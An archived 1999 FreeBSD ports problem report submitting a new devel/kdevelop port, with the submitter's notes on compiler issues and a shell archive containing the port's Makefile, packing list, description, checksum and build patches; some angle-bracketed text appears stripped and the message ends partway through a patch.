From owner-freebsd-ports Sun Dec 12 0:50:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 163DB14E1C for ; Sun, 12 Dec 1999 00:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA42474; Sun, 12 Dec 1999 00:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from pluto.psn.net (pluto.psn.net [207.211.58.12]) by hub.freebsd.org (Postfix) with ESMTP id 5270614EBE for ; Sun, 12 Dec 1999 00:47:44 -0800 (PST) (envelope-from will@argon.blackdawn.com) Received: from 17-044.008.popsite.net ([209.69.196.44] helo=shadow.blackdawn.com) by pluto.psn.net with esmtp (PSN Internet Service 3.12 #1) for FreeBSD-gnats-submit@FreeBSD.ORG id 11x4fK-0000s6-00; Sun, 12 Dec 1999 01:47:39 -0700 Received: from argon.blackdawn.com (argon.blackdawn.com [192.168.0.3]) by shadow.blackdawn.com (8.9.3/8.9.3) with ESMTP id DAA61759 for ; Sun, 12 Dec 1999 03:47:35 -0500 (EST) (envelope-from will@argon.blackdawn.com) Received: (from root@localhost) by argon.blackdawn.com (8.9.3/8.9.3) id DAA11882; Sun, 12 Dec 1999 03:47:31 -0500 (EST) (envelope-from will) Message-Id: <199912120847.DAA11882@argon.blackdawn.com> Date: Sun, 12 Dec 1999 03:47:31 -0500 (EST) From: Will Andrews Reply-To: Will Andrews To: FreeBSD-gnats-submit@FreeBSD.ORG X-Send-Pr-Version: 3.2 Subject: ports/15434: new port: devel/kdevelop Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15434 >Category: ports >Synopsis: new port: devel/kdevelop >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sun Dec 12 00:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Will Andrews >Release: FreeBSD 4.0-CURRENT i386 >Organization: none >Environment: FreeBSD argon.blackdawn.com 4.0-CURRENT FreeBSD 4.0-CURRENT #0: Tue Nov 30 10:14:31 EST 1999 root@argon.blackdawn.com:/usr/src/sys/compile/ARGON i386 >Description: The long-awaited kdevelop port. I would like to request that R. Imura review this port, if at all possible. A few things to note: I really tried to get this to work on 3.3-STABLE, but alas it was just not possible, not with the obsolete compiler used for the kde 1.1.2 and qt 1.42 libraries. The kdbg & kdevelop libraries conflicted.. As I said before and I say now: the only solution to the dilemma is to upgrade those ports accordingly. Further, I am uncertain if kdevelop as implemented by this port behaves the way it "normally" does, i.e., as it does for the folks on kdevelop@barney.cs.uni-potsdam.de that use Linux. Note that I've set the qtdocdir configure arg to a setting that currently does not exist. I am working on an upgrade for the Qt 1.42 port that will account for this as well as for USE_NEWGCC. Some of the patches in this port were not entirely necessary; i.e., -CURRENT could do without them. But they will come in handy should USE_NEWGCC be implemented in kdelibs11/qt142. Additionally, I know that 1.0beta4.1 is out of date now (the KDevelop people released 1.0final a few days ago). I will send in an update for this port ASAP. Hopefully, by then, the port will have been committed, and I won't have to send another gigantic shar. And for those that dare ask: YES, I have worked on this port since August 12th. As you can see, I really want this program to work properly on -STABLE. >How-To-Repeat: Use the shar below to add the port to the tree. >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # kdevelop # kdevelop/Makefile # kdevelop/pkg # kdevelop/pkg/PLIST # kdevelop/pkg/DESCR # kdevelop/pkg/COMMENT # kdevelop/files # kdevelop/files/md5 # kdevelop/patches # kdevelop/patches/patch-aa # kdevelop/patches/patch-ab # kdevelop/patches/patch-ac # kdevelop/patches/patch-ad # echo c - kdevelop mkdir -p kdevelop > /dev/null 2>&1 echo x - kdevelop/Makefile sed 's/^X//' >kdevelop/Makefile << 'END-of-kdevelop/Makefile' X# New ports collection makefile for: kdevelop X# Version required: 1.0b4.1 X# Date created: 12 Aug 1999 X# Whom: Will Andrews X# X# $FreeBSD$ X# X XDISTNAME= kdevelop-1.0beta4.1 XPKGNAME= kdevelop-1.0.4.1 XCATEGORIES= devel XMASTER_SITES= ftp://fara.cs.uni-potsdam.de/pub/kdevelop/ \ X ftp://129.187.206.68/pub/unix/ide/KDevelop/ \ X ftp://ftp.bawue.de/pub/unix/KDevelop/ \ X ftp://ftp.chg.ru/pub/X11/kdevelop/ \ X ftp://ftp.weltopia.com/pub/kdevelop/ \ X ftp://gd.tuwien.ac.at/hci/KDevelop/ \ X ftp://altair.dhs.org/pub/kdevelop/ X XMAINTAINER= andrews@technologist.com X X# it uses these to help w/ programming XRUN_DEPENDS= autoconf:${PORTSDIR}/devel/autoconf \ X automake:${PORTSDIR}/devel/automake \ X kdbg:${PORTSDIR}/devel/kdbg \ X ktranslator:${PORTSDIR}/devel/ktranslator \ X glimpse:${PORTSDIR}/textproc/glimpse \ X a2ps:${PORTSDIR}/print/a2ps43-letter X XGNU_CONFIGURE= yes XUSE_GMAKE= yes XUSE_NEWGCC= yes XUSE_QT= yes XMAKE_ENV= CXX="${CXX}" XCONFIGURE_ENV= CXX="${CXX}" QTINC=${X11BASE}/include/X11/ \ X QTLIB=${X11BASE} XCONFIGURE_ARGS= --prefix=${LOCALBASE} \ X --with-qtdoc-dir=${X11BASE}/share/doc/qt/html X X.include X X.if ${OSVERSION} < 400004 XBROKEN= "obsolete compiler" X.endif X X.include END-of-kdevelop/Makefile echo c - kdevelop/pkg mkdir -p kdevelop/pkg > /dev/null 2>&1 echo x - kdevelop/pkg/PLIST sed 's/^X//' >kdevelop/pkg/PLIST << 'END-of-kdevelop/pkg/PLIST' Xbin/kdevelop Xshare/doc/HTML/en/kdevelop/addendum/logotp3.png Xshare/doc/HTML/en/kdevelop/addendum/index.html Xshare/doc/HTML/en/kdevelop/addendum/index-1.html Xshare/doc/HTML/en/kdevelop/addendum/index-2.html Xshare/doc/HTML/en/kdevelop/addendum/index-3.html Xshare/doc/HTML/en/kdevelop/addendum/index-4.html Xshare/doc/HTML/en/kdevelop/addendum/index-5.html Xshare/doc/HTML/en/kdevelop/addendum/index-6.html Xshare/doc/HTML/en/kdevelop/addendum/index-7.html Xshare/doc/HTML/en/kdevelop/addendum/index-8.html Xshare/doc/HTML/en/kdevelop/kde_libref/logotp3.png Xshare/doc/HTML/en/kdevelop/kde_libref/index.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-1.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-2.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-3.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-4.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-5.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-6.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-7.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-8.html Xshare/doc/HTML/en/kdevelop/kde_libref/index-9.html Xshare/doc/HTML/en/kdevelop/logotp3.png Xshare/doc/HTML/en/kdevelop/index.html Xshare/doc/HTML/en/kdevelop/index-1.html Xshare/doc/HTML/en/kdevelop/index-2.html Xshare/doc/HTML/en/kdevelop/index-3.html Xshare/doc/HTML/en/kdevelop/index-4.html Xshare/doc/HTML/en/kdevelop/index-5.html Xshare/doc/HTML/en/kdevelop/index-6.html Xshare/doc/HTML/en/kdevelop/index-7.html Xshare/doc/HTML/en/kdevelop/index-8.html Xshare/doc/HTML/en/kdevelop/index-9.html Xshare/doc/HTML/en/kdevelop/index-10.html Xshare/doc/HTML/en/kdevelop/index-11.html Xshare/doc/HTML/en/kdevelop/index-12.html Xshare/doc/HTML/en/kdevelop/index-13.html Xshare/doc/HTML/en/kdevelop/index-14.html Xshare/doc/HTML/en/kdevelop/index-15.html Xshare/doc/HTML/en/kdevelop/index-16.html Xshare/doc/HTML/en/kdevelop/index-17.html Xshare/doc/HTML/en/kdevelop/programming/logotp3.png Xshare/doc/HTML/en/kdevelop/programming/index.html Xshare/doc/HTML/en/kdevelop/programming/index-1.html Xshare/doc/HTML/en/kdevelop/programming/index-2.html Xshare/doc/HTML/en/kdevelop/programming/index-3.html Xshare/doc/HTML/en/kdevelop/programming/index-4.html Xshare/doc/HTML/en/kdevelop/programming/index-5.html Xshare/doc/HTML/en/kdevelop/programming/index-6.html Xshare/doc/HTML/en/kdevelop/programming/index-7.html Xshare/doc/HTML/en/kdevelop/programming/index-8.html Xshare/doc/HTML/en/kdevelop/programming/index-9.html Xshare/doc/HTML/en/kdevelop/programming/index-10.html Xshare/doc/HTML/en/kdevelop/programming/index-11.html Xshare/doc/HTML/en/kdevelop/programming/index-12.html Xshare/doc/HTML/en/kdevelop/programming/index-13.html Xshare/doc/HTML/en/kdevelop/programming/index-14.html Xshare/doc/HTML/en/kdevelop/programming/index-15.html Xshare/doc/HTML/en/kdevelop/programming/index-16.html Xshare/doc/HTML/en/kdevelop/programming/index-17.html Xshare/doc/HTML/en/kdevelop/programming/index-18.html Xshare/doc/HTML/en/kdevelop/programming/index-19.html Xshare/doc/HTML/en/kdevelop/tutorial/logotp3.png Xshare/doc/HTML/en/kdevelop/tutorial/index.html Xshare/doc/HTML/en/kdevelop/tutorial/index-1.html Xshare/doc/HTML/en/kdevelop/tutorial/index-2.html Xshare/doc/HTML/en/kdevelop/tutorial/index-3.html Xshare/doc/HTML/en/kdevelop/tutorial/index-4.html Xshare/doc/HTML/en/kdevelop/welcome/logotp3.png Xshare/doc/HTML/en/kdevelop/welcome/index.html Xshare/doc/HTML/en/kdevelop/tip.database Xshare/doc/HTML/ru/kdevelop/welcome/logotp3.png Xshare/doc/HTML/ru/kdevelop/welcome/index.html Xshare/doc/HTML/ru/kdevelop/index.html Xshare/doc/HTML/ru/kdevelop/index-1.html Xshare/doc/HTML/ru/kdevelop/index-2.html Xshare/doc/HTML/ru/kdevelop/index-3.html Xshare/doc/HTML/ru/kdevelop/index-4.html Xshare/doc/HTML/ru/kdevelop/index-5.html Xshare/doc/HTML/ru/kdevelop/index-6.html Xshare/doc/HTML/ru/kdevelop/tutorial/logotp3.png Xshare/doc/HTML/ru/kdevelop/tutorial/index.html Xshare/doc/HTML/ru/kdevelop/tutorial/index-1.html Xshare/doc/HTML/ru/kdevelop/tutorial/index-2.html Xshare/doc/HTML/ru/kdevelop/tutorial/index-3.html Xshare/doc/HTML/ru/kdevelop/tutorial/index-4.html Xshare/doc/HTML/ru/kdevelop/tutorial/index-5.html Xshare/doc/HTML/ru/kdevelop/tutorial/index-6.html Xshare/doc/HTML/ru/kdevelop/reference/C/cref.html Xshare/doc/HTML/ru/kdevelop/programming/logotp3.png Xshare/doc/HTML/ru/kdevelop/programming/index.html Xshare/doc/HTML/ru/kdevelop/programming/index-1.html Xshare/doc/HTML/ru/kdevelop/programming/index-2.html Xshare/doc/HTML/ru/kdevelop/programming/index-3.html Xshare/doc/HTML/ru/kdevelop/programming/index-4.html Xshare/doc/HTML/ru/kdevelop/programming/index-5.html Xshare/doc/HTML/ru/kdevelop/programming/index-6.html Xshare/doc/HTML/ru/kdevelop/programming/index-7.html Xshare/doc/HTML/ru/kdevelop/programming/index-8.html Xshare/doc/HTML/ru/kdevelop/programming/index-9.html Xshare/doc/HTML/ru/kdevelop/programming/index-10.html Xshare/doc/HTML/ru/kdevelop/programming/index-11.html Xshare/doc/HTML/ru/kdevelop/programming/index-12.html Xshare/doc/HTML/ru/kdevelop/programming/index-13.html Xshare/doc/HTML/ru/kdevelop/programming/index-14.html Xshare/doc/HTML/ru/kdevelop/programming/index-15.html Xshare/doc/HTML/ru/kdevelop/programming/index-16.html Xshare/doc/HTML/ru/kdevelop/programming/index-17.html Xshare/doc/HTML/ru/kdevelop/programming/index-18.html Xshare/doc/HTML/ru/kdevelop/programming/index-19.html Xshare/doc/HTML/ru/kdevelop/tip.database Xshare/doc/HTML/de/kdevelop/logotp3.png Xshare/doc/HTML/de/kdevelop/index.html Xshare/doc/HTML/de/kdevelop/index-1.html Xshare/doc/HTML/de/kdevelop/index-2.html Xshare/doc/HTML/de/kdevelop/index-3.html Xshare/doc/HTML/de/kdevelop/index-4.html Xshare/doc/HTML/de/kdevelop/index-5.html Xshare/doc/HTML/de/kdevelop/index-6.html Xshare/doc/HTML/de/kdevelop/index-7.html Xshare/doc/HTML/de/kdevelop/index-8.html Xshare/doc/HTML/de/kdevelop/index-9.html Xshare/doc/HTML/de/kdevelop/index-10.html Xshare/doc/HTML/de/kdevelop/index-11.html Xshare/doc/HTML/de/kdevelop/index-12.html Xshare/doc/HTML/de/kdevelop/index-13.html Xshare/doc/HTML/de/kdevelop/index-14.html Xshare/doc/HTML/de/kdevelop/index-15.html Xshare/doc/HTML/de/kdevelop/index-16.html Xshare/doc/HTML/de/kdevelop/welcome/logotp3.png Xshare/doc/HTML/de/kdevelop/welcome/index.html Xshare/doc/HTML/de/kdevelop/tip.database Xshare/doc/HTML/fr/kdevelop/tutorial/logotp3.png Xshare/doc/HTML/fr/kdevelop/tutorial/index.html Xshare/doc/HTML/fr/kdevelop/tutorial/index-1.html Xshare/doc/HTML/fr/kdevelop/tutorial/index-2.html Xshare/doc/HTML/fr/kdevelop/tutorial/index-3.html Xshare/doc/HTML/fr/kdevelop/tutorial/index-4.html Xshare/doc/HTML/fr/kdevelop/welcome/logotp3.png Xshare/doc/HTML/fr/kdevelop/welcome/index.html Xshare/doc/HTML/fr/kdevelop/tip.database Xshare/doc/HTML/pt/kdevelop/logotp3.png Xshare/doc/HTML/pt/kdevelop/index.html Xshare/doc/HTML/pt/kdevelop/index-1.html Xshare/doc/HTML/pt/kdevelop/index-2.html Xshare/doc/HTML/pt/kdevelop/index-3.html Xshare/doc/HTML/pt/kdevelop/index-4.html Xshare/doc/HTML/pt/kdevelop/index-5.html Xshare/doc/HTML/pt/kdevelop/index-6.html Xshare/doc/HTML/pt/kdevelop/index-7.html Xshare/doc/HTML/pt/kdevelop/index-8.html Xshare/doc/HTML/pt/kdevelop/index-9.html Xshare/doc/HTML/pt/kdevelop/index-10.html Xshare/doc/HTML/pt/kdevelop/index-11.html Xshare/doc/HTML/pt/kdevelop/index-12.html Xshare/doc/HTML/pt/kdevelop/index-13.html Xshare/doc/HTML/pt/kdevelop/index-14.html Xshare/doc/HTML/pt/kdevelop/index-15.html Xshare/doc/HTML/pt/kdevelop/index-16.html Xshare/doc/HTML/pt/kdevelop/programming/logotp3.png Xshare/doc/HTML/pt/kdevelop/programming/index.html Xshare/doc/HTML/pt/kdevelop/programming/index-1.html Xshare/doc/HTML/pt/kdevelop/programming/index-2.html Xshare/doc/HTML/pt/kdevelop/programming/index-3.html Xshare/doc/HTML/pt/kdevelop/programming/index-4.html Xshare/doc/HTML/pt/kdevelop/programming/index-5.html Xshare/doc/HTML/pt/kdevelop/programming/index-6.html Xshare/doc/HTML/pt/kdevelop/programming/index-7.html Xshare/doc/HTML/pt/kdevelop/programming/index-8.html Xshare/doc/HTML/pt/kdevelop/programming/index-9.html Xshare/doc/HTML/pt/kdevelop/programming/index-10.html Xshare/doc/HTML/pt/kdevelop/programming/index-11.html Xshare/doc/HTML/pt/kdevelop/programming/index-12.html Xshare/doc/HTML/pt/kdevelop/programming/index-13.html Xshare/doc/HTML/pt/kdevelop/programming/index-14.html Xshare/doc/HTML/pt/kdevelop/programming/index-15.html Xshare/doc/HTML/pt/kdevelop/programming/index-16.html Xshare/doc/HTML/pt/kdevelop/programming/index-17.html Xshare/doc/HTML/pt/kdevelop/programming/index-18.html Xshare/doc/HTML/pt/kdevelop/tip.database Xshare/doc/HTML/es/kdevelop/tip.database Xshare/doc/HTML/nl/kdevelop/reference/C/cref.html Xshare/doc/HTML/nl/kdevelop/tip.database Xshare/doc/HTML/pl/kdevelop/tip.database Xshare/doc/HTML/sv/kdevelop/tip.database Xshare/doc/HTML/zh_CN.GB2312/kdevelop/welcome/logotp3.png Xshare/doc/HTML/zh_CN.GB2312/kdevelop/welcome/index.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tutorial/logotp3.png Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tutorial/index.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tutorial/index-1.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tutorial/index-2.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tutorial/index-3.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tutorial/index-4.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/index.html Xshare/doc/HTML/zh_CN.GB2312/kdevelop/tip.database Xshare/locale/da/LC_MESSAGES/kdevelop.mo Xshare/locale/de/LC_MESSAGES/kdevelop.mo Xshare/locale/es/LC_MESSAGES/kdevelop.mo Xshare/locale/fr/LC_MESSAGES/kdevelop.mo Xshare/locale/pl/LC_MESSAGES/kdevelop.mo Xshare/locale/pt/LC_MESSAGES/kdevelop.mo Xshare/locale/sv/LC_MESSAGES/kdevelop.mo Xshare/locale/cs/LC_MESSAGES/kdevelop.mo Xshare/locale/it/LC_MESSAGES/kdevelop.mo Xshare/locale/pt_BR/LC_MESSAGES/kdevelop.mo Xshare/locale/ru/LC_MESSAGES/kdevelop.mo Xshare/locale/hu/LC_MESSAGES/kdevelop.mo Xshare/locale/fi/LC_MESSAGES/kdevelop.mo Xshare/locale/zh_CN.GB2312/LC_MESSAGES/kdevelop.mo Xshare/locale/sk/LC_MESSAGES/kdevelop.mo Xshare/locale/tr/LC_MESSAGES/kdevelop.mo Xshare/config/kdeveloprc Xshare/apps/kdevelop/tools/processesend.pl Xshare/apps/kdevelop/tools/processes.pl Xshare/apps/kdevelop/templates/AUTHORS_template Xshare/apps/kdevelop/templates/COPYING_template Xshare/apps/kdevelop/templates/ChangeLog_template Xshare/apps/kdevelop/templates/INSTALL_template Xshare/apps/kdevelop/templates/README_template Xshare/apps/kdevelop/templates/TODO_template Xshare/apps/kdevelop/templates/cpp_template Xshare/apps/kdevelop/templates/handbook_en_template Xshare/apps/kdevelop/templates/header_template Xshare/apps/kdevelop/templates/kdelnk_template Xshare/apps/kdevelop/templates/lsm_template Xshare/apps/kdevelop/templates/normal.tar.gz Xshare/apps/kdevelop/templates/mini.tar.gz Xshare/apps/kdevelop/templates/cpp.tar.gz Xshare/apps/kdevelop/templates/preview1 Xshare/apps/kdevelop/templates/preview2 Xshare/apps/kdevelop/templates/icon_template Xshare/apps/kdevelop/templates/qt.tar.gz Xshare/apps/kdevelop/templates/c.tar.gz Xshare/apps/kdevelop/templates/nif_template Xshare/apps/kdevelop/templates/lexical_template Xshare/apps/kdevelop/templates/cvsignore_template Xshare/apps/kdevelop/toolbar/make.xpm Xshare/apps/kdevelop/toolbar/stop_proc.xpm Xshare/apps/kdevelop/toolbar/run.xpm Xshare/apps/kdevelop/toolbar/copy.xpm Xshare/apps/kdevelop/toolbar/paste.xpm Xshare/apps/kdevelop/toolbar/open.xpm Xshare/apps/kdevelop/toolbar/cut.xpm Xshare/apps/kdevelop/toolbar/save.xpm Xshare/apps/kdevelop/toolbar/save_all.xpm Xshare/apps/kdevelop/toolbar/undo.xpm Xshare/apps/kdevelop/toolbar/redo.xpm Xshare/apps/kdevelop/toolbar/openprj.xpm Xshare/apps/kdevelop/toolbar/compfile.xpm Xshare/apps/kdevelop/toolbar/rebuild.xpm Xshare/apps/kdevelop/toolbar/print.xpm Xshare/apps/kdevelop/toolbar/debugger.xpm Xshare/apps/kdevelop/toolbar/lookup.xpm Xshare/apps/kdevelop/toolbar/newwidget.xpm Xshare/apps/kdevelop/toolbar/generate.xpm Xshare/apps/kdevelop/toolbar/output_win.xpm Xshare/apps/kdevelop/toolbar/tree_win.xpm Xshare/apps/kdevelop/toolbar/reload_page.xpm Xshare/apps/kdevelop/toolbar/indent.xpm Xshare/apps/kdevelop/toolbar/start_page.xpm Xshare/apps/kdevelop/toolbar/file_properties.xpm Xshare/apps/kdevelop/toolbar/unindent.xpm Xshare/apps/kdevelop/toolbar/grep.xpm Xshare/apps/kdevelop/toolbar/classwiz.xpm Xshare/apps/kdevelop/toolbar/graphview.xpm Xshare/apps/kdevelop/pics/mini/CTchildren.xpm Xshare/apps/kdevelop/pics/mini/CTclients.xpm Xshare/apps/kdevelop/pics/mini/CTparents.xpm Xshare/apps/kdevelop/pics/mini/CTsuppliers.xpm Xshare/apps/kdevelop/pics/mini/CTvirtuals.xpm Xshare/apps/kdevelop/pics/mini/CVclass.xpm Xshare/apps/kdevelop/pics/mini/CVglobal_meth.xpm Xshare/apps/kdevelop/pics/mini/CVglobal_var.xpm Xshare/apps/kdevelop/pics/mini/CVprivate_meth.xpm Xshare/apps/kdevelop/pics/mini/CVprivate_signal.xpm Xshare/apps/kdevelop/pics/mini/CVprivate_slot.xpm Xshare/apps/kdevelop/pics/mini/CVprivate_var.xpm Xshare/apps/kdevelop/pics/mini/CVprotected_meth.xpm Xshare/apps/kdevelop/pics/mini/CVprotected_signal.xpm Xshare/apps/kdevelop/pics/mini/CVprotected_slot.xpm Xshare/apps/kdevelop/pics/mini/CVprotected_var.xpm Xshare/apps/kdevelop/pics/mini/CVpublic_meth.xpm Xshare/apps/kdevelop/pics/mini/CVstruct.xpm Xshare/apps/kdevelop/pics/mini/CVpublic_signal.xpm Xshare/apps/kdevelop/pics/mini/CVpublic_slot.xpm Xshare/apps/kdevelop/pics/mini/CVpublic_var.xpm Xshare/apps/kdevelop/pics/mini/inst_file.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QCheckBox.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QLCDNumer.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QLabel.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QLineEdit.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QPushButton.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QRadioButton.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QWidget.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QComboBox.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QMultiLineEdit.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QProgressBar.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QSpinBox.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QSlider.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QScrollBar.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QGroupBox.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QListBox.xpm Xshare/apps/kdevelop/pics/mini/kdlg_QListView.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KCombo.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KKeyButton.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KColorButton.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KRestrictedLine.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KTreeList.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KLedLamp.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KLed.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KProgress.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KSeparator.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KDatePicker.xpm Xshare/apps/kdevelop/pics/mini/kdlg_KDateTable.xpm Xshare/apps/kdevelop/pics/kAppWizard.bmp Xshare/apps/kdevelop/pics/miniApp.bmp Xshare/apps/kdevelop/pics/normalApp.bmp Xshare/apps/kdevelop/pics/terminalApp.bmp Xshare/apps/kdevelop/pics/startlogo.bmp Xshare/apps/kdevelop/pics/tipday.bmp Xshare/apps/kdevelop/pics/qtApp.bmp Xshare/apps/kdevelop/pics/customApp.bmp Xshare/apps/kdevelop/pics/dlg_firstrun.bmp Xshare/apps/kdevelop/pics/about_logo.bmp Xshare/icons/mini/kdevelop.xpm Xshare/icons/kdevelop.xpm Xshare/icons/kdevelop-project.xpm Xshare/mimelnk/application/x-kdevelop-project.kdelnk Xshare/applnk/Development/kdevelop.kdelnk Xshare/applnk/Development/kdevelop-setup.kdelnk Xlib/libkdlgloader.la X@dirrm share/apps/kdevelop/pics/mini X@dirrm share/apps/kdevelop/pics X@dirrm share/apps/kdevelop/tools X@dirrm share/apps/kdevelop/templates X@dirrm share/apps/kdevelop/toolbar X@dirrm share/apps/kdevelop X@dirrm share/doc/HTML/es/kdevelop X@dirrm share/doc/HTML/en/kdevelop/kde_libref X@dirrm share/doc/HTML/en/kdevelop/addendum X@dirrm share/doc/HTML/en/kdevelop/programming X@dirrm share/doc/HTML/en/kdevelop/tutorial X@dirrm share/doc/HTML/en/kdevelop/welcome X@dirrm share/doc/HTML/en/kdevelop X@dirrm share/doc/HTML/ru/kdevelop/welcome X@dirrm share/doc/HTML/ru/kdevelop/tutorial X@dirrm share/doc/HTML/ru/kdevelop/reference/C X@dirrm share/doc/HTML/ru/kdevelop/reference X@dirrm share/doc/HTML/ru/kdevelop/programming X@dirrm share/doc/HTML/ru/kdevelop X@dirrm share/doc/HTML/de/kdevelop/welcome X@dirrm share/doc/HTML/de/kdevelop X@dirrm share/doc/HTML/fr/kdevelop/tutorial X@dirrm share/doc/HTML/fr/kdevelop/welcome X@dirrm share/doc/HTML/fr/kdevelop X@dirrm share/doc/HTML/pt/kdevelop/programming X@dirrm share/doc/HTML/pt/kdevelop X@dirrm share/doc/HTML/nl/kdevelop/reference/C X@dirrm share/doc/HTML/nl/kdevelop/reference X@dirrm share/doc/HTML/nl/kdevelop X@dirrm share/doc/HTML/pl/kdevelop X@dirrm share/doc/HTML/sv/kdevelop X@dirrm share/doc/HTML/zh_CN.GB2312/kdevelop/welcome X@dirrm share/doc/HTML/zh_CN.GB2312/kdevelop/tutorial X@dirrm share/doc/HTML/zh_CN.GB2312/kdevelop END-of-kdevelop/pkg/PLIST echo x - kdevelop/pkg/DESCR sed 's/^X//' >kdevelop/pkg/DESCR << 'END-of-kdevelop/pkg/DESCR' XKDevelop is a complete IDE, made primarily for Xthe K Desktop Environment. It seems to be quite Xcomparable to CodeWarrior Pro on Windows/MacOS. XPaired with kdbg, ktranslator, and other helper Xapps, it makes one heck of a powerful KDE/Qt Xapplication developer. X XWWW: http://www.kdevelop.org/ X X- Will END-of-kdevelop/pkg/DESCR echo x - kdevelop/pkg/COMMENT sed 's/^X//' >kdevelop/pkg/COMMENT << 'END-of-kdevelop/pkg/COMMENT' XPowerful IDE for developing KDE/Qt-based apps. END-of-kdevelop/pkg/COMMENT echo c - kdevelop/files mkdir -p kdevelop/files > /dev/null 2>&1 echo x - kdevelop/files/md5 sed 's/^X//' >kdevelop/files/md5 << 'END-of-kdevelop/files/md5' XMD5 (kdevelop-1.0beta4.1.tar.gz) = 8c4a9da50060ca958e1f94e649816465 END-of-kdevelop/files/md5 echo c - kdevelop/patches mkdir -p kdevelop/patches > /dev/null 2>&1 echo x - kdevelop/patches/patch-aa sed 's/^X//' >kdevelop/patches/patch-aa << 'END-of-kdevelop/patches/patch-aa' X--- kdevelop/Makefile.in Sat Oct 30 11:07:38 1999 X+++ kdevelop/Makefile.in.new Sat Nov 20 20:16:11 1999 X@@ -206,7 +206,7 @@ X kdevelop_LDFLAGS = $(all_libraries) $(KDE_RPATH) X # the libraries to link against. Be aware of the order. First the libraries, X # that depend on the following ones. X-kdevelop_LDADD = ./vc/libvc.a ./print/libprint.a ./gfxview/libgfxview.a ./kdlgedit/libkdlgedit.a ./kwrite/libkwrite.a ./classparser/libclassparser.a ./classwizard/libclasswizard.a -lkfile -lkfm -lkspell $(LIB_KHTMLW) -lkdeui -lkdecore -lqt -lXext -lX11 $(LIBSOCKET) -lfl -ldb -ldl X+kdevelop_LDADD = -lkfile -lkfm -lkspell -lpng $(LIB_KHTMLW) -lkdeui -lkdecore -lqt -lXext -lX11 $(LIBSOCKET) -lfl ./vc/libvc.a ./print/libprint.a ./gfxview/libgfxview.a ./kdlgedit/libkdlgedit.a ./kwrite/libkwrite.a ./classparser/libclassparser.a ./classwizard/libclasswizard.a X X # this option you can leave out. Just, if you use "make dist", you need it X noinst_HEADERS = ckdevelop.h cnewfiledlg.h ceditwidget.h coutputwidget.h ctabctl.h ckdevsetupdlg.h cprjoptionsdlg.h crealfileview.h clogfileview.h structdef.h cdocbrowser.h cproject.h cclassview.h kswallow.h cgeneratenewfile.h doctreeview.h cnewclassdlg.h cfilepropdlg.h caddexistingfiledlg.h cgrouppropertiesdlg.h cupdatekdedocdlg.h resource.h kdevelop.kdelnk ckappwizard.h ccreatedocdatabasedlg.h ctoolclass.h cdoctreepropdlg.h debug.h cfinddoctextdlg.h kstartuplogo.h ktipofday.h ckdevinstall.h caddclassmethoddlg.h caddclassattributedlg.h cclasstooldlg.h cclasstreehandler.h ctreehandler.h ctreeview.h cerrormessageparser.h cexecuteargdlg.h ccvaddfolderdlg.h klangcombo.h caddnewtranslationdlg.h grepdialog.h ctoolsconfigdlg.h cbugreportdlg.h cclasstooltreeview.h cmakemanualdlg.h klistview.h ckdevaccel.h END-of-kdevelop/patches/patch-aa echo x - kdevelop/patches/patch-ab sed 's/^X//' >kdevelop/patches/patch-ab << 'END-of-kdevelop/patches/patch-ab' X--- kdevelop/classparser/tokenizer.cc Sat Oct 30 11:07:23 1999 X+++ kdevelop/classparser/tokenizer.cc.new Sun Dec 12 01:41:58 1999 X@@ -235,7 +235,7 @@ X #define yytext_ptr yytext X #define YY_INTERACTIVE X X-#include X+#include "g++/FlexLexer.h" X X X /* Done after the current pattern has been matched and before the X@@ -674,7 +674,7 @@ X #include X #include X #include "tokenizer.h" X- #include "FlexLexer.h" X+ #include 